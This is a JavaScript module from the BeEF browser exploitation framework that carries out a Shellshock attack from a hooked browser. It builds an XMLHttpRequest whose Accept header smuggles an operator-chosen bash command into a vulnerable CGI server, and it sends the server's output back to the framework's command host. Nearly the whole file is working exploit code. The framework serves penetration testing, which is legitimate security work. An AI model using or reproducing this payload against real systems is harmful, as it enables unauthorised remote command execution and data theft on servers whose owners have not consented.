Path: blob/master/modules/exploits/shell_shocked/command.js
1154 views
//1// Copyright (c) 2006-2025 Wade Alcorn - [email protected]2// Browser Exploitation Framework (BeEF) - https://beefproject.com3// See the file 'doc/COPYING' for copying permission4//56beef.execute(function () {7try {8var target = "<%=@Target%>";9var command = "<%=@Bash_Command%>";10var method = "<%=@method%>";11var xhr = new XMLHttpRequest();12xhr.open(method, target, true);13xhr.onload = function () {14};15xhr.onreadystatechange = function () {16if (xhr.readyState == 4 && xhr.status == 200) {17beef.net.send("<%= @command_url %>", <%= @command_id %>, "result="+xhr.response);18}19}20xhr.setRequestHeader("Accept", "() { test;};echo \"Content-type: text/plain\"; echo; echo; " + command);21xhr.send(null);22} catch (e){23beef.net.send("<%= @command_url %>", <%= @command_id %>, "result= Something wrong "+e.message);24}25});262728